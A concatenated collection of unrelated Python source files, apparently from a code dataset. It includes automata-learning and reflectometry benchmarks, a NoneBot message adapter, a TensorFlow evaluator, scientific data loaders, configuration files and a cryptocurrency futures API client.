result = host.run('stack remove pallet minimal')
assert result.rc == 0
result = host.run('stack list repo')
assert result.rc == 0
assert result.stdout == ''
|
22283
|
import json
from ..connection import get_connection
class Metadata:
def __init__(self, database):
self.connection = get_connection(database).connection
# first list is default if nothing is specified (should be extended)
# list is ordered as [edge_name, node1_id, edge_node1_id, edge_node2_id, node2_id2
def get_metadata(self):
self.connection.execute("SELECT metadata FROM _meta")
metadata = json.loads(self.connection.fetchone()[0])
return metadata
def update_metadata(self, data):
self.connection.execute(f"UPDATE _meta SET metadata='{json.dumps(data)}'")
def get_default_join_info(self, node1, node2):
return self.get_metadata()[node1][node2][0]
def get_all_join_info(self, node1, node2):
return self.get_metadata()[node1][node2]
# {
# 'term_dict': {
# 'docs': [['term_doc', 'term_id', 'term_id', 'doc_id', 'doc_id']]
# },
# 'docs': {
# 'term_dict': [['term_doc', 'doc_id', 'doc_id', 'term_id', 'term_id']],
# 'entities': [['entity_doc', 'collection_id', 'doc_id', 'entity', 'entity']],
# 'authors': [['doc_author', 'collection_id', 'doc', 'author', 'author']]
# },
# 'entities': {
# 'docs': [['entity_doc', 'entity', 'entity', 'doc_id', 'collection_id']]
# },
# 'authors': {
# 'docs': [['doc_author', 'author', 'author', 'doc', 'collection_id']]
# }
# }
|
22291
|
from statistics import mean
import csv
from aalpy.SULs import DfaSUL, MealySUL, MooreSUL
from aalpy.learning_algs import run_Lstar
from aalpy.oracles import RandomWalkEqOracle
from aalpy.utils import generate_random_dfa, generate_random_mealy_machine, generate_random_moore_machine
num_states = 1000
alph_size = 5
repeat = 10
num_increases = 20
states = ['alph_size', alph_size]
times_dfa = ['dfa_pypy_rs']
times_mealy = ['mealy_pypy_rs']
times_moore = ['moore_pypyrs']
cex_processing = 'rs'
for i in range(num_increases):
print(i)
total_time_dfa = []
total_time_mealy = []
total_time_moore = []
for _ in range(repeat):
alphabet = list(range(alph_size))
dfa = generate_random_dfa(num_states, alphabet=alphabet, num_accepting_states=num_states // 2)
sul = DfaSUL(dfa)
# eq_oracle = StatePrefixEqOracle(alphabet, sul, walks_per_state=5, walk_len=40)
eq_oracle = RandomWalkEqOracle(alphabet, sul, num_steps=10000, reset_prob=0.09)
_, data = run_Lstar(alphabet, sul, eq_oracle, cex_processing=cex_processing, cache_and_non_det_check=False,
return_data=True, automaton_type='dfa')
total_time_dfa.append(data['learning_time'])
del dfa
del sul
del eq_oracle
mealy = generate_random_mealy_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)
sul_mealy = MealySUL(mealy)
# eq_oracle = StatePrefixEqOracle(alphabet, sul_mealy, walks_per_state=5, walk_len=40)
eq_oracle = RandomWalkEqOracle(alphabet, sul_mealy, num_steps=10000, reset_prob=0.09)
_, data = run_Lstar(alphabet, sul_mealy, eq_oracle, cex_processing=cex_processing,
cache_and_non_det_check=False,
return_data=True, automaton_type='mealy')
total_time_mealy.append(data['learning_time'])
del mealy
del sul_mealy
del eq_oracle
moore = generate_random_moore_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)
moore_sul = MooreSUL(moore)
# eq_oracle = StatePrefixEqOracle(alphabet, moore_sul, walks_per_state=5, walk_len=40)
eq_oracle = RandomWalkEqOracle(alphabet, moore_sul, num_steps=10000, reset_prob=0.09)
_, data = run_Lstar(alphabet, moore_sul, eq_oracle, cex_processing=cex_processing,
cache_and_non_det_check=False,
return_data=True, automaton_type='moore')
total_time_moore.append(data['learning_time'])
alph_size += 5
states.append(alph_size)
# save data and keep averages
times_dfa.append(round(mean(total_time_dfa), 4))
times_mealy.append(round(mean(total_time_mealy), 4))
times_moore.append(round(mean(total_time_moore), 4))
with open('increasing_alphabet_experiments.csv', 'w') as f:
wr = csv.writer(f, dialect='excel')
wr.writerow(states)
wr.writerow(times_dfa)
wr.writerow(times_mealy)
wr.writerow(times_moore)
|
22300
|
from ralph.api.serializers import RalphAPISerializer
from ralph.api.viewsets import RalphAPIViewSet, RalphReadOnlyAPIViewSet
from ralph.api.routers import router
__all__ = [
'RalphAPISerializer',
'RalphAPIViewSet',
'RalphReadOnlyAPIViewSet',
'router',
]
|
22301
|
from odoo import models, fields, api
from odoo.exceptions import ValidationError
class DemoOdooWizardTutorial(models.Model):
_name = 'demo.odoo.wizard.tutorial'
_description = 'Demo Odoo Wizard Tutorial'
name = fields.Char('Description', required=True)
partner_id = fields.Many2one('res.partner', string='Partner')
@api.multi
def action_context_demo(self):
# if self._context.get('context_data', False):
if self.env.context.get('context_data'):
raise ValidationError('have context data')
raise ValidationError('hello')
@api.multi
def action_button(self):
for record in self:
record.with_context(context_data=True).action_context_demo()
|
22322
|
import re
from typing import Any, Type, Tuple, Union, Iterable
from nonebot.typing import overrides
from nonebot.adapters import Message as BaseMessage
from nonebot.adapters import MessageSegment as BaseMessageSegment
from .utils import escape, unescape
from .api import Message as GuildMessage
from .api import MessageArk, MessageEmbed
class MessageSegment(BaseMessageSegment["Message"]):
@classmethod
@overrides(BaseMessageSegment)
def get_message_class(cls) -> Type["Message"]:
return Message
@staticmethod
def ark(ark: MessageArk) -> "Ark":
return Ark("ark", data={"ark": ark})
@staticmethod
def embed(embed: MessageEmbed) -> "Embed":
return Embed("embed", data={"embed": embed})
@staticmethod
def emoji(id: str) -> "Emoji":
return Emoji("emoji", data={"id": id})
@staticmethod
def image(url: str) -> "Attachment":
return Attachment("attachment", data={"url": url})
@staticmethod
def mention_user(user_id: int) -> "MentionUser":
return MentionUser("mention_user", {"user_id": str(user_id)})
@staticmethod
def mention_channel(channel_id: int) -> "MentionChannel":
return MentionChannel("mention_channel", {"channel_id": str(channel_id)})
@staticmethod
def text(content: str) -> "Text":
return Text("text", {"text": content})
@overrides(BaseMessageSegment)
def is_text(self) -> bool:
return self.type == "text"
class Text(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return escape(self.data["text"])
class Emoji(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<emoji:{self.data['id']}>"
class MentionUser(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<@{self.data['user_id']}>"
class MentionEveryone(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return "@everyone"
class MentionChannel(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<#{self.data['channel_id']}>"
class Attachment(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<attachment:{self.data['url']}>"
class Embed(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<embed:{self.data['embed']}>"
class Ark(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<ark:{self.data['ark']}>"
class Message(BaseMessage[MessageSegment]):
@classmethod
@overrides(BaseMessage)
def get_segment_class(cls) -> Type[MessageSegment]:
return MessageSegment
@overrides(BaseMessage)
def __add__(
self, other: Union[str, MessageSegment, Iterable[MessageSegment]]
) -> "Message":
return super(Message, self).__add__(
MessageSegment.text(other) if isinstance(other, str) else other
)
@overrides(BaseMessage)
def __radd__(
self, other: Union[str, MessageSegment, Iterable[MessageSegment]]
) -> "Message":
return super(Message, self).__radd__(
MessageSegment.text(other) if isinstance(other, str) else other
)
@staticmethod
@overrides(BaseMessage)
def _construct(msg: str) -> Iterable[MessageSegment]:
text_begin = 0
for embed in re.finditer(
r"\<(?P<type>(?:@|#|emoji:))!?(?P<id>\w+?)\>",
msg,
):
content = msg[text_begin : embed.pos + embed.start()]
if content:
yield Text("text", {"text": unescape(content)})
text_begin = embed.pos + embed.end()
if embed.group("type") == "@":
yield MentionUser("mention_user", {"user_id": embed.group("id")})
elif embed.group("type") == "#":
yield MentionChannel(
"mention_channel", {"channel_id": embed.group("id")}
)
else:
yield Emoji("emoji", {"id": embed.group("id")})
content = msg[text_begin:]
if content:
yield Text("text", {"text": unescape(msg[text_begin:])})
@classmethod
def from_guild_message(cls, message: GuildMessage) -> "Message":
msg = Message()
if message.content:
msg.extend(Message(message.content))
if message.attachments:
msg.extend(
Attachment("attachment", data={"url": seg.url})
for seg in message.attachments
if seg.url
)
if message.embeds:
msg.extend(Embed("embed", data={"embed": seg}) for seg in message.embeds)
if message.ark:
msg.append(Ark("ark", data={"ark": message.ark}))
return msg
def extract_content(self) -> str:
return "".join(
str(seg)
for seg in self
if seg.type
in ("text", "emoji", "mention_user", "mention_everyone", "mention_channel")
)
|
22344
|
from configs import cfg
from src.utils.record_log import _logger
import numpy as np
import tensorflow as tf
import scipy.stats as stats
class Evaluator(object):
def __init__(self, model):
self.model = model
self.global_step = model.global_step
## ---- summary----
self.build_summary()
self.writer = tf.summary.FileWriter(cfg.summary_dir)
def get_evaluation(self, sess, dataset_obj, global_step=None):
_logger.add()
_logger.add('getting evaluation result for %s' % dataset_obj.data_type)
logits_list, loss_list = [], []
target_score_list, predicted_score_list = [], []
for sample_batch, _, _, _ in dataset_obj.generate_batch_sample_iter():
feed_dict = self.model.get_feed_dict(sample_batch, 'dev')
logits, loss, predicted_score = sess.run([self.model.logits, self.model.loss,
self.model.predicted_score], feed_dict)
logits_list.append(np.argmax(logits, -1))
loss_list.append(loss)
predicted_score_list.append(predicted_score)
for sample in sample_batch:
target_score_list.append(sample['relatedness_score'])
logits_array = np.concatenate(logits_list, 0)
loss_value = np.mean(loss_list)
target_scores = np.array(target_score_list)
predicted_scores = np.concatenate(predicted_score_list, 0)
# pearson, spearman, mse
pearson_value = stats.pearsonr(target_scores, predicted_scores)[0]
spearman_value = stats.spearmanr(target_scores, predicted_scores)[0]
mse_value = np.mean((target_scores - predicted_scores) ** 2)
# todo: analysis
# analysis_save_dir = cfg.mkdir(cfg.answer_dir, 'gs_%d' % global_step or 0)
# OutputAnalysis.do_analysis(dataset_obj, logits_array, accu_array, analysis_save_dir,
# cfg.fine_grained)
if global_step is not None:
if dataset_obj.data_type == 'train':
summary_feed_dict = {
self.train_loss: loss_value,
self.train_pearson: pearson_value,
self.train_spearman: spearman_value,
self.train_mse: mse_value,
}
summary = sess.run(self.train_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
elif dataset_obj.data_type == 'dev':
summary_feed_dict = {
self.dev_loss: loss_value,
self.dev_pearson: pearson_value,
self.dev_spearman: spearman_value,
self.dev_mse: mse_value,
}
summary = sess.run(self.dev_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
else:
summary_feed_dict = {
self.test_loss: loss_value,
self.test_pearson: pearson_value,
self.test_spearman: spearman_value,
self.test_mse: mse_value,
}
summary = sess.run(self.test_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
return loss_value, (pearson_value, spearman_value, mse_value)
# --- internal use ------
def build_summary(self):
with tf.name_scope('train_summaries'):
self.train_loss = tf.placeholder(tf.float32, [], 'train_loss')
self.train_pearson = tf.placeholder(tf.float32, [], 'train_pearson')
self.train_spearman = tf.placeholder(tf.float32, [], 'train_spearman')
self.train_mse = tf.placeholder(tf.float32, [], 'train_mse')
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_loss', self.train_loss))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_pearson', self.train_pearson))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_spearman', self.train_spearman))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_mse', self.train_mse))
self.train_summaries = tf.summary.merge_all('train_summaries_collection')
with tf.name_scope('dev_summaries'):
self.dev_loss = tf.placeholder(tf.float32, [], 'dev_loss')
self.dev_pearson = tf.placeholder(tf.float32, [], 'dev_pearson')
self.dev_spearman = tf.placeholder(tf.float32, [], 'dev_spearman')
self.dev_mse = tf.placeholder(tf.float32, [], 'dev_mse')
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_loss',self.dev_loss))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_pearson', self.dev_pearson))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_spearman', self.dev_spearman))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_mse', self.dev_mse))
self.dev_summaries = tf.summary.merge_all('dev_summaries_collection')
with tf.name_scope('test_summaries'):
self.test_loss = tf.placeholder(tf.float32, [], 'test_loss')
self.test_pearson = tf.placeholder(tf.float32, [], 'test_pearson')
self.test_spearman = tf.placeholder(tf.float32, [], 'test_spearman')
self.test_mse = tf.placeholder(tf.float32, [], 'test_mse')
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_loss',self.test_loss))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_pearson', self.test_pearson))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_spearman', self.test_spearman))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_mse', self.test_mse))
self.test_summaries = tf.summary.merge_all('test_summaries_collection')
|
22356
|
from . import utils
import os
import scanpy as sc
import scprep
import tempfile
URL = "https://ndownloader.figshare.com/files/25555751"
@utils.loader
def load_human_blood_nestorowa2016(test=False):
"""Download Nesterova data from Figshare."""
if test:
# load full data first, cached if available
adata = load_human_blood_nestorowa2016(test=False)
# Subsample data
adata = adata[:, :500].copy()
utils.filter_genes_cells(adata)
sc.pp.subsample(adata, n_obs=500)
# Note: could also use 200-500 HVGs rather than 200 random genes
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
else:
with tempfile.TemporaryDirectory() as tempdir:
filepath = os.path.join(tempdir, "human_blood_nestorowa2016.h5ad")
scprep.io.download.download_url(URL, filepath)
adata = sc.read(filepath)
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
|
22375
|
from data_process.census_process.census_data_creation_config import census_data_creation
fg_feature_extractor_architecture_list = [[28, 56, 28, 14],
[25, 50, 25, 12],
[56, 86, 56, 18],
[27, 54, 27, 13]]
intr_fg_feature_extractor_for_architecture_list = [[53, 78, 53, 15],
[84, 120, 84, 20],
[55, 81, 55, 15],
[81, 120, 81, 20],
[52, 78, 52, 15],
[83, 120, 83, 20]]
no_fg_feature_extractor_architecture = [136, 150, 60, 20]
pre_train_hyperparameters = {
"using_interaction": False,
"momentum": 0.99,
"weight_decay": 0.00001,
"lr": 5e-4,
"batch_size": 128,
"max_epochs": 600,
"epoch_patience": 2,
"valid_metric": ('ks', 'auc')
}
fine_tune_hyperparameters = {
"using_interaction": False,
"load_global_classifier": False,
"momentum": 0.99,
"weight_decay": 0.0,
"lr": 8e-4,
"batch_size": 128,
"valid_metric": ('ks', 'auc')
}
no_adaptation_hyperparameters = {
"apply_feature_group": False,
"train_data_tag": 'all', # can be either 'all' or 'tgt'
"momentum": 0.99,
"weight_decay": 0.00001,
"lr": 5e-4,
"batch_size": 128,
"max_epochs": 600,
"epoch_patience": 2,
"valid_metric": ('ks', 'auc')
}
data_dir = census_data_creation['processed_data_dir']
data_tag = 'all4000pos004'
data_hyperparameters = {
"source_ad_train_file_name": data_dir + f'undergrad_census9495_ad_{data_tag}_train.csv',
"source_ad_valid_file_name": data_dir + f'undergrad_census9495_ad_{data_tag}_valid.csv',
"src_tgt_train_file_name": data_dir + f'degree_src_tgt_census9495_{data_tag}_train.csv',
"target_ad_train_file_name": data_dir + f'grad_census9495_ad_{data_tag}_train.csv',
"target_ft_train_file_name": data_dir + f'grad_census9495_ft_{data_tag}_train.csv',
"target_ft_valid_file_name": data_dir + f'grad_census9495_ft_{data_tag}_valid.csv',
"target_ft_test_file_name": data_dir + f'grad_census9495_ft_{data_tag}_test.csv',
"census_fg_pretrained_model_dir": "census_fg_pretrained_model",
"census_fg_ft_target_model_dir": "census_fg_ft_target_model",
"census_no-fg_pretrained_model_dir": "census_no-fg_pretrained_model",
"census_no-fg_ft_target_model_dir": "census_no-fg_ft_target_model",
"census_no-ad_model_dir": "census_no-ad_model"
}
|
22383
|
from .. import global_vars as g
from ..window import Window
import numpy as np
from ..roi import makeROI
class TestSettings():
def test_random_roi_color(self):
initial = g.settings['roi_color']
g.settings['roi_color'] = 'random'
w1 = Window(np.random.random([10, 10, 10]))
roi1 = makeROI('rectangle', [[1, 1], [3, 3]])
roi2 = makeROI('rectangle', [[2, 2], [3, 3]])
assert roi1.pen.color().name() != roi2.pen.color().name(), 'Random ROI color is the same. This could be a random chance. Run repeatedly.'
g.settings['roi_color'] = '#00ff00'
roi3 = makeROI('rectangle', [[3, 3], [3, 3]])
assert roi3.pen.color().name() == "#00ff00", 'ROI color set. all rois are same color'
g.settings['roi_color'] = initial
def test_multitrace(self):
initial = g.settings['multipleTraceWindows']
g.settings['multipleTraceWindows'] = False
w1 = Window(np.random.random([10, 10, 10]))
roi1 = makeROI('rectangle', [[1, 1], [3, 3]])
roi1.plot()
roi2 = makeROI('rectangle', [[2, 2], [3, 3]])
roi2.plot()
assert roi1.traceWindow == roi2.traceWindow, 'Traces not plotted together.'
g.settings['multipleTraceWindows'] = True
roi3 = makeROI('rectangle', [[3, 3], [3, 3]])
roi3.plot()
assert roi3.traceWindow != roi1.traceWindow, 'Multiple trace windows'
g.settings['multipleTraceWindows'] = initial
|
22411
|
from time import strftime
from flask_wtf import FlaskForm
from wtforms import (
Form,
validators,
StringField,
IntegerField,
SubmitField,
BooleanField,
SelectField,
TextAreaField,
)
|
22414
|
import os.path
import numpy as np
import pickle
from .common import Benchmark
from refnx.analysis import CurveFitter, Objective, Parameter
import refnx.reflect
from refnx.reflect._creflect import abeles as c_abeles
from refnx.reflect._reflect import abeles
from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity
from refnx.dataset import ReflectDataset as RD
class Abeles(Benchmark):
def setup(self):
self.q = np.linspace(0.005, 0.5, 50000)
self.layers = np.array([[0, 2.07, 0, 3],
[50, 3.47, 0.0001, 4],
[200, -0.5, 1e-5, 5],
[50, 1, 0, 3],
[0, 6.36, 0, 3]])
self.repeat = 20
self.number = 10
def time_cabeles(self):
c_abeles(self.q, self.layers)
def time_abeles(self):
abeles(self.q, self.layers)
def time_reflectivity_constant_dq_q(self):
reflectivity(self.q, self.layers)
def time_reflectivity_pointwise_dq(self):
reflectivity(self.q, self.layers, dq=0.05 * self.q)
class Reflect(Benchmark):
timeout = 120.
# repeat = 2
def setup(self):
pth = os.path.dirname(os.path.abspath(refnx.reflect.__file__))
e361 = RD(os.path.join(pth, 'test', 'e361r.txt'))
sio2 = SLD(3.47, name='SiO2')
si = SLD(2.07, name='Si')
d2o = SLD(6.36, name='D2O')
polymer = SLD(1, name='polymer')
# e361 is an older dataset, but well characterised
structure361 = si | sio2(10, 4) | polymer(200, 3) | d2o(0, 3)
model361 = ReflectModel(structure361, bkg=2e-5)
model361.scale.vary = True
model361.bkg.vary = True
model361.scale.range(0.1, 2)
model361.bkg.range(0, 5e-5)
model361.dq = 5.
# d2o
structure361[-1].sld.real.vary = True
structure361[-1].sld.real.range(6, 6.36)
self.p = structure361[1].thick
structure361[1].thick.vary = True
structure361[1].thick.range(5, 20)
structure361[2].thick.vary = True
structure361[2].thick.range(100, 220)
structure361[2].sld.real.vary = True
structure361[2].sld.real.range(0.2, 1.5)
self.structure361 = structure361
self.model361 = model361
# e361.x_err = None
self.objective = Objective(self.model361,
e361)
self.fitter = CurveFitter(self.objective, nwalkers=200)
self.fitter.initialise('jitter')
def time_reflect_emcee(self):
# test how fast the emcee sampler runs in serial mode
self.fitter.sampler.run_mcmc(self.fitter._state, 30)
def time_reflect_sampling_parallel(self):
# discrepancies in different runs may be because of different numbers
# of processors
self.model361.threads = 1
self.fitter.sample(30, pool=-1)
def time_pickle_objective(self):
# time taken to pickle an objective
s = pickle.dumps(self.objective)
pickle.loads(s)
def time_pickle_model(self):
# time taken to pickle a model
s = pickle.dumps(self.model361)
pickle.loads(s)
def time_pickle_model(self):
# time taken to pickle a parameter
s = pickle.dumps(self.p)
pickle.loads(s)
def time_structure_slabs(self):
self.structure361.slabs()
|
22420
|
import os
from abc import ABC, abstractmethod
class File(ABC):
"""
Abstract class representing text files.
"""
@abstractmethod
def __init__(self):
pass
@staticmethod
def write_file(filename, text, overwrite_existing=True):
"""
Writes output text to a file.
Args:
filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
text (str): desired contents of file
overwrite_existing (Bool): whether any existing files should be overwritten or not
Returns:
``True`` if write succeeded, ``False`` otherwise
"""
if not isinstance(text, str):
raise TypeError("cannot write non-string to file!")
if not overwrite_existing and os.path.exists(filename):
raise ValueError(f"{filename} already exists but not allowed to overwrite")
else:
try:
with open(filename, "w+") as output_file:
output_file.write(text)
return True
except OSError as e:
print(e)
return False
@staticmethod
def append_to_file(filename, text):
"""
Appends output text to a file.
Args:
filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
text (str): desired contents of file
Returns:
``True`` if write succeeded, ``False`` otherwise
"""
if not isinstance(text, str):
raise TypeError("cannot write non-string to file!")
if os.path.exists(filename):
try:
with open(filename, "a+") as output_file:
output_file.write(text)
return True
except OSError as e:
print(e)
return False
else:
raise ValueError(f"{filename} does not exist")
@staticmethod
def read_file(filename, lazy=False):
"""
Reads a file and parses into lines.
Args:
filename (str): The path to the file.
Returns:
A list containing all the lines in the file.
"""
with open(filename, "r") as filehandle:
lines = filehandle.read().splitlines()
return lines
|
22424
|
try:
from DeepRTS import Engine
except ImportError:
import Engine
try:
from DeepRTS.Engine import Map, UnitManager, Constants, Player
from DeepRTS.Engine import Constants
except ImportError:
from Engine import Map, UnitManager, Constants, Player, Constants
|
22478
|
import logging
import sys
from .pipeline import MWFPipeline
def build(config):
config["source"] = config["source"] or {}
config["tweaks"] = config["tweaks"] or []
config["converter"] = config["converter"] or {}
config["generator"] = config["generator"] or []
pipeline = MWFPipeline(config["source"].get("api_path"))
if config["source"].get("api_path") is not None:
pipeline.fetch_titles(**config["source"].get("kwargs"))
if config["source"].get("file_path") is not None:
title_file_path = config["source"].get("file_path")
if title_file_path is None:
logging.error("No api_path or file_path provided. Stop.")
sys.exit(1)
if isinstance(title_file_path, str):
title_file_path = [title_file_path]
for i in title_file_path:
pipeline.load_titles_from_file(i,
**config["source"].get("kwargs"))
pipeline.convert_to_words(config["tweaks"])
pipeline.export_words(config["converter"].get("use"),
**config["converter"].get("kwargs"))
generators = config["generator"]
if not isinstance(generators, list):
generators = [generators]
for gen in generators:
pipeline.generate_dict(gen.get("use"), **gen.get("kwargs"))
return pipeline.dict
|
22487
|
from .client import Client
from .consts import *
class FutureAPI(Client):
def __init__(self, api_key, api_secret_key, passphrase, use_server_time=False, first=False):
Client.__init__(self, api_key, api_secret_key, passphrase, use_server_time, first)
# query position
def get_position(self):
return self._request_without_params(GET, FUTURE_POSITION)
# query specific position
def get_specific_position(self, instrument_id):
return self._request_without_params(GET, FUTURE_SPECIFIC_POSITION + str(instrument_id) + '/position')
# query accounts info
def get_accounts(self):
return self._request_without_params(GET, FUTURE_ACCOUNTS)
# query coin account info
def get_coin_account(self, underlying):
return self._request_without_params(GET, FUTURE_COIN_ACCOUNT + str(underlying))
# query leverage
def get_leverage(self, underlying):
return self._request_without_params(GET, FUTURE_GET_LEVERAGE + str(underlying) + '/leverage')
# set leverage
def set_leverage(self, underlying, leverage, instrument_id='', direction=''):
params = {'leverage': leverage}
if instrument_id:
params['instrument_id'] = instrument_id
if direction:
params['direction'] = direction
return self._request_with_params(POST, FUTURE_SET_LEVERAGE + str(underlying) + '/leverage', params)
# query ledger
def get_ledger(self, underlying, after='', before='', limit='', type=''):
params = {}
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
if type:
params['type'] = type
return self._request_with_params(GET, FUTURE_LEDGER + str(underlying) + '/ledger', params, cursor=True)
# take order
# def take_order(self, instrument_id, type, price, size, client_oid='', order_type='0', match_price='0'):
# params = {'client_oid': client_oid, 'instrument_id': instrument_id, 'type': type, 'order_type': order_type, 'price': price, 'size': size, 'match_price': match_price}
# return self._request_with_params(POST, FUTURE_ORDER, params)
# take order 下单
def take_order(self, client_oid,instrument_id, otype,price, size, leverage, order_type,match_price):
params = {'client_oid':client_oid,'instrument_id': instrument_id, 'type': otype, 'price': price, 'size': size, 'leverage': leverage,'order_type':order_type,'match_price':match_price}
return self._request_with_params(POST, FUTURE_ORDER, params)
# take orders
def take_orders(self, instrument_id, orders_data):
params = {'instrument_id': instrument_id, 'orders_data': orders_data}
return self._request_with_params(POST, FUTURE_ORDERS, params)
# revoke order
def revoke_order(self, instrument_id, order_id='', client_oid=''):
if order_id:
return self._request_without_params(POST, FUTURE_REVOKE_ORDER + str(instrument_id) + '/' + str(order_id))
elif client_oid:
return self._request_without_params(POST, FUTURE_REVOKE_ORDER + str(instrument_id) + '/' + str(client_oid))
# revoke orders
def revoke_orders(self, instrument_id, order_ids='', client_oids=''):
params = {}
if order_ids:
params = {'order_ids': order_ids}
elif client_oids:
params = {'client_oids': client_oids}
return self._request_with_params(POST, FUTURE_REVOKE_ORDERS + str(instrument_id), params)
# query order list
def get_order_list(self, state, instrument_id,after='', before='', limit=''):
params = {'state': state}
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_ORDERS_LIST + str(instrument_id), params, cursor=True)
# query order info
def get_order_info(self, instrument_id, order_id='', client_oid=''):
if order_id:
return self._request_without_params(GET, FUTURE_ORDER_INFO + str(instrument_id) + '/' + str(order_id))
elif client_oid:
return self._request_without_params(GET, FUTURE_ORDER_INFO + str(instrument_id) + '/' + str(client_oid))
# query fills
def get_fills(self, instrument_id, order_id='', after='', before='', limit=''):
params = {'instrument_id': instrument_id}
if order_id:
params['order_id'] = order_id
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_FILLS, params, cursor=True)
# set margin_mode
def set_margin_mode(self, underlying, margin_mode):
params = {'underlying': underlying, 'margin_mode': margin_mode}
return self._request_with_params(POST, FUTURE_MARGIN_MODE, params)
# close_position
def close_position(self, instrument_id, direction):
params = {'instrument_id': instrument_id, 'direction': direction}
return self._request_with_params(POST, FUTURE_CLOSE_POSITION, params)
# cancel_all
def cancel_all(self, instrument_id, direction):
params = {'instrument_id': instrument_id, 'direction': direction}
return self._request_with_params(POST, FUTURE_CANCEL_ALL, params)
# take order_algo
def take_order_algo(self, instrument_id, type, order_type, size, trigger_price='', algo_price='', callback_rate='', algo_variance='', avg_amount='', price_limit='', sweep_range='', sweep_ratio='', single_limit='', time_interval=''):
params = {'instrument_id': instrument_id, 'type': type, 'order_type': order_type, 'size': size}
if order_type == '1': # 止盈止损参数(最多同时存在10单)
params['trigger_price'] = trigger_price
params['algo_price'] = algo_price
elif order_type == '2': # 跟踪委托参数(最多同时存在10单)
params['callback_rate'] = callback_rate
params['trigger_price'] = trigger_price
elif order_type == '3': # 冰山委托参数(最多同时存在6单)
params['algo_variance'] = algo_variance
params['avg_amount'] = avg_amount
params['price_limit'] = price_limit
elif order_type == '4': # 时间加权参数(最多同时存在6单)
params['sweep_range'] = sweep_range
params['sweep_ratio'] = sweep_ratio
params['single_limit'] = single_limit
params['price_limit'] = price_limit
params['time_interval'] = time_interval
return self._request_with_params(POST, FUTURE_ORDER_ALGO, params)
# cancel_algos
def cancel_algos(self, instrument_id, algo_ids, order_type):
params = {'instrument_id': instrument_id, 'algo_ids': algo_ids, 'order_type': order_type}
return self._request_with_params(POST, FUTURE_CANCEL_ALGOS, params)
# get order_algos
def get_order_algos(self, instrument_id, order_type, status='', algo_id='', before='', after='', limit=''):
params = {'order_type': order_type}
if status:
params['status'] = status
elif algo_id:
params['algo_id'] = algo_id
if before:
params['before'] = before
if after:
params['after'] = after
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_GET_ORDER_ALGOS + str(instrument_id), params)
def get_trade_fee(self):
return self._request_without_params(GET, FUTURE_TRADE_FEE)
# get products info
def get_products(self):
return self._request_without_params(GET, FUTURE_PRODUCTS_INFO)
# get depth
def get_depth(self, instrument_id, size='', depth=''):
params = {'size': size, 'depth': depth}
return self._request_with_params(GET, FUTURE_DEPTH + str(instrument_id) + '/book', params)
# get ticker
def get_ticker(self):
return self._request_without_params(GET, FUTURE_TICKER)
# get specific ticker
def get_specific_ticker(self, instrument_id):
return self._request_without_params(GET, FUTURE_SPECIFIC_TICKER + str(instrument_id) + '/ticker')
# query trades
def get_trades(self, instrument_id, after='', before='', limit=''):
params = {}
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_TRADES + str(instrument_id) + '/trades', params, cursor=True)
# query k-line
def get_kline(self, instrument_id, granularity='', start='', end=''):
params = {'granularity': granularity, 'start': start, 'end': end}
# 按时间倒叙 即由结束时间到开始时间
return self._request_with_params(GET, FUTURE_KLINE + str(instrument_id) + '/candles', params)
# 按时间正序 即由开始时间到结束时间
# data = self._request_with_params(GET, FUTURE_KLINE + str(instrument_id) + '/candles', params)
# return list(reversed(data))
# query index
def get_index(self, instrument_id):
return self._request_without_params(GET, FUTURE_INDEX + str(instrument_id) + '/index')
# query rate
def get_rate(self):
return self._request_without_params(GET, FUTURE_RATE)
# query estimate price
def get_estimated_price(self, instrument_id):
return self._request_without_params(GET, FUTURE_ESTIMAT_PRICE + str(instrument_id) + '/estimated_price')
# query the total platform of the platform
def get_holds(self, instrument_id):
return self._request_without_params(GET, FUTURE_HOLDS + str(instrument_id) + '/open_interest')
# query limit price
def get_limit(self, instrument_id):
return self._request_without_params(GET, FUTURE_LIMIT + str(instrument_id) + '/price_limit')
# query limit price
def get_liquidation(self, instrument_id, status, limit='', froms='', to=''):
params = {'status': status}
if limit:
params['limit'] = limit
if froms:
params['from'] = froms
if to:
params['to'] = to
return self._request_with_params(GET, FUTURE_LIQUIDATION + str(instrument_id) + '/liquidation', params)
# query holds amount
def get_holds_amount(self, instrument_id):
return self._request_without_params(GET, HOLD_AMOUNT + str(instrument_id) + '/holds')
